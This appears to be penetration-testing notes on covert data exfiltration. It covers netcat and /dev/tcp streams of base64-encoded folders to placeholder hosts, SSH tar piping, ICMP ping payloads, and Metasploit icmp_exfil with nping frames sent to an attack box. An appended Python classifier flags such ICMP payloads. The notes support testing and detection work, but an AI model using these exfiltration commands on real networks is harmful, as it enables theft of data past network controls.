Good for testing outbound communication (Code Execution)
TCP Tunneling
Using simple TCP with netcat
# Listen on port 1337 and redirect incoming data to a file
nc -lvp 1337 > ./received_data
# Send a compressed, base64-encoded folder over a raw TCP connection
# (dd conv=ebcdic converts the ASCII stream to EBCDIC before sending;
#  the receiver has to convert it back, e.g. with dd conv=ascii)
tar zcf - Folder/ | base64 | dd conv=ebcdic > /dev/tcp/<IP>/<ListeningPort>
# Minimal variant: send a single base64-encoded line
echo "hello world" | base64 > /dev/tcp/<ip>/<port>
SSH Tunneling
Sending data over SSH without keeping an interactive session open:
# Stream a tarball through SSH and unpack it on the remote host in one command
tar cf - DIRECTORY/ | ssh user@host "cd some_folder; tar xpf -"
HTTP Tunneling
Tunneling data over HTTP via API POST requests with cURL, wget, etc.
Sample Web Servers (The interesting one is the Flask one):
ICMP Tunneling
Carrying data in the payload of ICMP echo packets:
# Convert the payload to hex (xxd -p prints a plain hex string)
echo -n "Hello" | xxd -p
# Send the hex bytes as the ping payload pattern
# (-p takes up to 16 pad bytes, given in hex)
ping -c 1 <IP> -p 4141414141
ICMPDoor: ICMP Tunneling
Nping: Network Packet Generation
Using Metasploit
msf5 > use auxiliary/server/icmp_exfil
msf5 auxiliary(server/icmp_exfil) > set BPF_FILTER icmp and not src (MY IP)
BPF_FILTER => icmp and not src (MY IP)
msf5 auxiliary(server/icmp_exfil) > set INTERFACE eth0
INTERFACE => eth0
msf5 auxiliary(server/icmp_exfil) > run
icmp_exfil expects a BOF marker to open a transfer and an EOF marker to close it:
# "BOF" followed by a filename: msf opens a new file with that name
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "BOFnew_file.txt"
# One or more data packets; each payload is appended to the file
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "MESSAGE"
# "EOF": msf stops collecting and saves the file
sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "EOF"
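As an added defender-side example (not part of these notes), a Python classifier that separates stock ping padding from the BOF/EOF framing and the patterned or text payloads shown above. The stock-ping padding constants and the sample payloads are constructed assumptions, not captured traffic.

```python
import re
import string

# Padding that stock ping clients put after the 8-byte timestamp (Linux) or use
# as the whole payload (Windows). Using these as an allow-list is an assumption.
LINUX_PAD = bytes(range(0x10, 0x38))
WINDOWS_PAD = b"abcdefghijklmnopqrstuvwabcdefghi"
PRINTABLE = set(string.printable.encode())

def looks_like_stock_ping(payload: bytes) -> bool:
    """True if the payload matches what an unmodified ping would send."""
    if payload == WINDOWS_PAD:
        return True
    return len(payload) > 8 and LINUX_PAD.startswith(payload[8:])

def classify_icmp_payload(payload: bytes) -> str:
    """Return a short verdict for one ICMP echo-request payload."""
    if looks_like_stock_ping(payload):
        return "benign-ping"
    # Metasploit icmp_exfil framing: "BOF<name>" opens a transfer, "EOF" closes it.
    if payload.startswith(b"BOF") and len(payload) > 3:
        return "exfil-start:" + payload[3:].decode("ascii", "replace")
    if payload == b"EOF":
        return "exfil-end"
    # `ping -p <hex>` repeats a short pattern after the timestamp (0x41 -> "AAAA...").
    body = payload[8:] if len(payload) > 16 else payload
    if len(body) >= 8 and len(set(body)) == 1:
        return "repeated-pattern"
    # Mostly printable payloads carry text; base64 is 4-byte aligned with no spaces.
    if payload and sum(b in PRINTABLE for b in payload) / len(payload) > 0.9:
        if len(payload) % 4 == 0 and re.fullmatch(rb"[A-Za-z0-9+/]+=*", payload):
            return "base64-like"
        return "text"
    return "unknown"

# Constructed sample payloads (not captured traffic), modelled on the commands above.
SAMPLES = {
    "linux_ping": b"\x00" * 8 + LINUX_PAD,
    "windows_ping": WINDOWS_PAD,
    "ping_p_41": b"\x00" * 8 + b"A" * 48,   # Linux ping -p 41
    "msf_bof": b"BOFnew_file.txt",
    "msf_data": b"MESSAGE",
    "msf_eof": b"EOF",
    "b64_line": b"aGVsbG8gd29ybGQK",        # base64 of "hello world\n"
}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name:12} {classify_icmp_payload(payload)}")
```

The stock-ping check is deliberately strict: a detector would pair it with volume and size baselining, since a single odd payload is a weak signal on its own.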